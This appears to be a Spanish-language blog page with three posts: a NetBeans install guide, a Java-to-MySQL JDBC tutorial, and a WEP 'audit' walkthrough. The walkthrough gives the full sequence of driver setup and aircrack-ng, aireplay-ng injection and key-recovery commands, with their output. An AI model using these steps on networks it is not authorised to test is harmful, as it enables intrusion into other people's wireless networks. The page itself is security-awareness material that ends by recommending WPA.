Para seguir con el how-to de Java y MySQL, es necesario que instalemos Neatbeans, que sera nuestro IDE de desarrollo, lo he probado un buen tiempo en Ubuntu y es muy bueno y estable, la instalacion es muy sencilla, ya que se puede descargar de la pagina un archivo binario, para la instalacion, pero antes debemos, instalar la maquina virtual y el JDK, empecemos Para instalar la maquina virtual y JDK de Java tecleamos lo siguiente.
-
sudo apt-get install sun-java6-jdk
Esto instalara la versio1.6.X.X. Ahora debemos obtener el binario de netbeans, este lo obtendremos directamente de la [pagina], escojemos el idioma hay una version en español por si no te entro mucho el ingles, la version indicada para nuestro S.O. y al bajar el paquete, hay que darle permisos de ejecusion.
-
sudo chmod +x netbeans-x.x.x-es.bin
Despues de esto solo hay que correrlo como cualquier otro binario
-
./netbean-x.x.x-es.bin
Y enseguida empesara a buscar la JVM, Si encuntra la JVM aparecera esta pantalla que es la primera del asistente.
Despues buscara el JDK, que es muy importate ubicar donde se encuentra, para poder agregar drivers de conexion a B.D. como MySQL, PostgreSQL, etc.
Despues, solo indicara el espacio a ocupar, e iniciara la copia de archivos.
Al terminar indicara la forma de ejecutar en forma manual, nosotros como somos muy flojos para teclear iremos al menu Aplicaciones » Programacion, y ahi encontraran Netbeans 5.5, en mi caso.
Y listo para empezar a programar con gui.
- 2 Comments
- Tags: JAVA, NETBEANS, PROGRAMACION, UBUNTU
Adutoria de seguridad wireless con ipw3945 ubuntu y aircrack
Author: yovany In: LINUX, SEGURIDAD, UBUNTU, WIRELESSEn vista al interes de muchos de mis amigos, en cuanto este tema, vamos a dar una pequeña reseña sobre la inseguridad del cifrado WEP, en las redes wireless.
Cabe mencionar que no nos hacemos responsables del mal uso que se le pueda dar a esta informacion y que lo unico que pretendemos es poner en evidencia la inseguridad que representa usar el cifrado WEP en las redes wireless, y que las pruebas que podamos efectuar, siempre sea dentro de redes en las cuales tengamos total concentimiento de sus administradores o propietarios, aclarado este punto continuemos con lo que nos interesa.
Esta informacion esta comprobada para las versiones 7.4 y 7.10, cuando instalamos ubuntu en nuestro equipo, por defecto instala la tarjeta de red con el modulo IPW394 (Intel ProWireless 3945 ABG), para poder hacer la auditoria, es necesario poder poner la tarjeta en modo monitor, lo cual no es posible con este modulo, por lo que es necario instalar los modulos IPWRAW
Antes de instalar el ipwraw debemos instalar algunas dependencias, esto lo hacemos de la siguiente forma
-
$ sudo apt-get install - build-essential
-
$ sudo apt-get install - linux-ubuntu-modules-$(uname -r) linux-restricted-modules-$(uname -r) linux-image-debug-$(uname -r) linux-image-$(uname -r) linux-headers-$(uname -r)
Aqui (uname -r), nos sirve para devolver la version del kernel que tenemos instalado, asi no tendremos problemas para instalar los paquetes que requerimos.
Si no hemos tenido ningun error hasta aqui, continuamos con la instalacion de ipwraw
descargamos las fuentes
-
wget http://dl.aircrack-ng.org/drivers/ipwraw-ng-2.3.4-04022008.tar.bz2
Descomprimimos el paquete,
-
tar -xjf ipwraw-ng-2.3.4-04022008.tar.bz2
Para instalar, nos cambiamos a la carpeta que se acaba de generar, y tecleamos.
-
sudo make
-
sudo make install
-
sudo make install_ucode
Con esto ya esta instalado el modulo, pero ahora lo agregaremos a la black list, esto para que no lo carge por defecto si no, solo cuando lo necesitemos.
-
echo “blacklist ipwraw” | sudo tee /etc/modprobe.d/ipwraw
-
sudo depmod -ae
Ya tenemos todo listo, para poder usar el ipwraw ahora solo hay desmontar el driver ipw3945 y cargar el ipwraw
-
sudo modprobe -r ipw3945
-
-
sudo modprobe ipwraw
Para cargar el ipw3945, hacemos lo mismo, pero al contrario.
-
sudo modprobe -r ipwraw
-
-
sudo modprobe ipw3945
Despues de montar y desmontar los driver's hay que esperar un poco para que se efectuen los cambios.
Para comprobar, que esten funcionando, tecleamos lo siguiente.
-
iwconfig
Y devemos obtener algo como esto.
-
lo no wireless extensions.
-
-
eth0 no wireless extensions.
-
-
vmnet1 no wireless extensions.
-
-
vmnet8 no wireless extensions.
-
-
eth1 unassociated ESSID:off/any
-
Mode:Monitor Channel=1 Bit Rate=54 Mb/s
-
-
rtap0 no wireless extensions.
Tal vez puedas obtener wifi0 en lugar de eth1
Para efectuar la auditoria necesitaremos la suite aircrack si no la tenemos instalada lo hacemos con esto.
-
sudo apt-get install aircrack-ng
Listo, ahora empezaremos por averiguar cuales son los acces points accesibles
-
airodump-ng rtap0
Y deberiamos obtener algo parecido a esto.
-
CH 0 ][ Elapsed: 8 s ][ 2008-03-05 21:01
-
-
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
-
-
XX:XX:XX:XX:XX:XX 0 86 9 0 1 54. WEP WEP MAGI
-
-
BSSID STATION PWR Lost Packets Probes
Al identificar nustro objetivo debemos ejecutar el siguiente script para poder inyectar trafico.
Veremos algo asi
-
“Indica el canal para eth1 o wifi0?
-
1
-
“Indica el rate de captura por defecto debe ser 2”
-
2
-
“Indica el bssid objetivo”
-
XX:XX:XX:XX:XX:XX
-
“Configuracion completada, listo par inyectar”
Empezamos a capturar los paquetes con el airodump-bg
-
airodump-ng -c CANAL -w FICHERO rtap0
Y deberiamos obteneralgo asi
-
CH 1 ][ BAT: 1 hour 38 mins ][ Elapsed: 48 s ][ 2008-03-05 21:34
-
-
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
-
-
XX:XX:XX:XX:XX:XX 0 100 467 47 0 1 54. WEP WEP MAGI
-
-
BSSID STATION PWR Lost Packets Probes
Para poder inyectar necesitamos asociarnos con el acces point.
-
aireplay-ng -1 0 -e ESSID -a MAC_PUNTODEACCESO -h NUESTRAMAC eth1
-
21:52:30 Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX)
-
21:52:30 Sending Authentication Request
-
21:52:30 Authentication successful
-
21:52:30 Sending Association Request
-
21:52:32 Association successful :-)
Ya que estamos asociados, podemos inyectar para poder generar DATA que son los paquetes que nos interesan
-
aireplay-ng -3 -b MAC_PUNTODEACCESO -h -h NUESTRAMAC eth1
En unos cuantos segundos podemos ver como genero unos miles de DATA
-
Saving ARP requests in replay_arp-0305-215511.cap
-
You should also start airodump-ng to capture replies.
-
Read 16339 packets (got 8045 ARP requests), sent 8042 packets...(333 pps)
Esperamos alrededor de 10 min para obtener una buena cantidad de DATA, el tiempo puede variar segun la distancia a la que te encuentres del acces point, no hay una cantidad exacta pero entre 200 300 mil DATA son suficientes segun lo comprobado.
Ahora solo hay que pasar el fichero por el aircrack
-
aircrack-ng FICHERO.cap
Y listo
-
Aircrack-ng 0.9
-
-
[00:00:01] Tested 1 keys (got 552366 IVs)
-
-
KB depth byte(vote)
-
0 0/ 1 39( 100) 11( 33) D6( 15) 6C( 13) 6D( 12) 0D( 11) 17( 9) 95( 8) 5D( 5) 76( 5) 93( 5) D0( 5) 00( 4) 0C( 4) 3A( 3)
-
1 0/ 1 93( 100) 03( 37) 06( 31) 83( 19) 19( 13) 39( 12) B3( 12) D4( 12) 02( 11) CC( 8) FD( 7) 6C( 5) 86( 5) D2( 5) 30( 4)
-
2 0/ 1 19( 121) 1B( 15) CE( 12) EB( 12) 2C( 9) 41( 8) 82( 8) CD( 6) 00( 5) 15( 5) 1A( 5) 2B( 5) 34( 5) 39( 5) A2( 5)
-
3 0/ 1 94( 88) 18( 20) 78( 18) D8( 17) 19( 16) D0( 16) 0D( 10) 83( 9) 69( 8) 75( 6) 82( 6) A0( 6) 41( 5) 46( 5) A2( 5)
-
-
KEY FOUND! [ 39:93:19:94:35 ]
-
Decrypted correctly: 100%
Todo esto se puede hacer de forma mas simple, con el airoway.sh solo hay que editar la interfas de injecion segun sea nuestro caso, que puede ser wifi0 o eth1
-
LISTEN="rtap0"
-
INJECT="eth1"
Como podemos ver, el cifrado WEP no es suficiente para la proteccion de nuestra redes wireless, no exponga la integridad de su red, y utilecen WPA.
Espero le haya sido de utilidad.
Referencias:
http://aircrack-ng.org/doku.php?id=ipw3945
http://seguridadwireless.net
Como lo prometido es deuda aqui esta la segunda parte del mini tutorial de JAVA y MySQL ahora veremos la parte de la conexion a MySQL desde JAVA.
La Base de Datos
Para poder hacer la practica debemos crear la siguiente base de datos ya que la conexion hara referencia a los campos que estan aqui.
Para entrar en mysql, en la consola haremos lo siguiente
-
$ mysql -u nuestro_usuario -p
Ojo el usuario con el que vamos a entrar es con el que instalamos mysql, ya que es el que tiene configurado el password en mysql mas adelante veremos como asignar mas usuarios y passsword para mysql.
Una vez que nos haya pedido el password nos mostrara el promp de mysql algo asi:
-
Welcome to the MySQL monitor. Commands end with ; or \g.
-
Your MySQL connection id is 10
-
Server version: 5.0.45-Debian_1ubuntu3.1-log Debian etch distribution
-
-
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
-
-
mysql>
Ahora teclearemos lo siguiente atencion de poner ; (punto y coma) al final de cada sentencia de lo contrario asumira que el comando aun continua.
-
CREATE DATABASE AGENDA;
-
-
USE AGENDA;
-
-
CREATE TABLE DATOS
-
(
-
NOMBRE VARCHAR(25),
-
TELEFONO VARCHAR(15),
-
CORREO VARCHAR(25),
-
TWITTER VARCHAR(30)
-
);
-
-
INSERT INTO DATOS VALUES('ALAN GASCA','57803747','blue.star.boy@gmail.com','www.twitter.com/yovany');
-
INSERT INTO DATOS VALUES('ALMA DELIA','26461263','almawook@yahoo.com','www.twitter.com/alma');
Con esto abremos creado una base de datos que se llama agenda, le indicamos que agenda es la base de datos donde vamos a trabajar, creamos una tabla que se llama datos e insertamos unos valores para poder ver los resultados de la practica.
Ahora vamos con JAVA
-
import java.awt.*;
-
import java.sql.*;
-
import java.util.*;
-
import javax.swing.*;
-
import java.io.*;
-
import java.net.*;
-
-
public class agenda
-
{
-
public String BD="AGENDA"; // ESTA VARIABLE GUARDA EL NOMBRE DE LA BASE DE DATOS A LA QUE NOS VAMOS A CONECTAR
-
public String consulta="SELECT * FROM DATOS";// ESTA GUARDA LA CONSULTA SQL QUE SE VA A EJECUTAR EN LA BD
-
public String USUARIO="mi_usuario";
-
public String PASS="mi_paswd";
-
public Connection conexion=null; // LAS VARIABLES PARA PODER GENERAR LA CONEXION A LA BD
-
public Statement sentencia=null;
-
public ResultSet resultado=null;
-
-
public agenda()
-
{
-
-
try
-
{
-
//LE INDICAMOS A JAVA CUAL ES EL DRIVER QUE VAMOS A UTILIZAR
-
Class.forName("com.mysql.jdbc.Driver").newInstance();
-
//ESTA ES NUESTRA CADENA DE CONEXION LE INDICAMOS CUAL ES LA SIRRCION IP DEL SERVIDOR DE MYSQL
-
//ADEMAS DE LA BASE DE DATOS A LA QUE SE VA A CONECTAR ASI COMO EL USUARIO Y PASSWORD
-
//RECUERDEN QUE ES EL USUARION CON EL QUE SE INSTALO MYSQL
-
conexion=DriverManager.getConnection("jdbc:mysql://127.0.0.1:3306/"+BD,USUARIO,PASS);
-
sentencia=conexion.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,ResultSet.CONCUR_READ_ONLY);
-
//ESTA VARIABLE ES LA QUE VA GUARDAR LOS RESULTADOS QUE GENERE LA CONSULTA
-
//EL EXECUTEQUERY ES EL METODO QUE EJECUTA LA CONSULTA
-
resultado=sentencia.executeQuery(consulta);
-
//SI LA CONSULTA RETORNA VALORES LA VARIABLE RESULTADO SE UBICARA UNA POCOSION
-
//ANTES DEL PRIMER VALOR, ENTONCES SI SE CUMPLE QUE EXISTA UN VALOR EN LA SIGUIENTE
-
//POCISION EN TRARA AL WHILE
-
while(resultado.next())
-
{
-
//Y SE IMPRIMIRAN LOS VALORES DE LA CONSULTA, QUE SE OBTIENEN CON GETSTRING, SE LE PUEDE PASAR EL NUMERO O NOMBRE DE LA COLUMNA DE LA TABLA
-
System.out.println(resultado.getString("NOMBRE")+" | "+resultado.getString("TELEFONO")+" | "+resultado.getString("CORREO")+" | "+resultado.getString("TWITTER"));
-
}System.out.println("Estos son los datos de la agenda... ");
-
//TODO ESTO DEVE SIEMPRE DE IR DENTRO DE UN TRY, DE LO CONTRARIO NOS MARCAR UN ERROR
-
}
-
catch(Exception error)
-
{
-
System.out.println("Error: "+error);
-
}
-
-
}
-
public static void main( String[] arg )
-
{
-
agenda miAgenda = new agenda();
-
}
-
}
Para probar el codigo debemos ejecutarlo de la siguiente manera, primero debemos cambiarnos a la carpeta donde esta ubicado el archivo agenda.java y tecleamos lo siguiente
-
javac agenda.java
Si no obtenemos ningun error, lo ejecutamos asi
-
java agenda
Y obtendremos esto
-
ALAN GASCA | 57803747 | blue.star.boy@gmail.com | www.twitter.com/yovany
-
ALMA DELIA | 26461263 | almawook@yahoo.com | www.twitter.com/alma
Espero sea claro en la siguiente parte haremos una insercion y consulta con una interfas grafica, con netbeans, ojala les sea de utilidad.
Sponsored
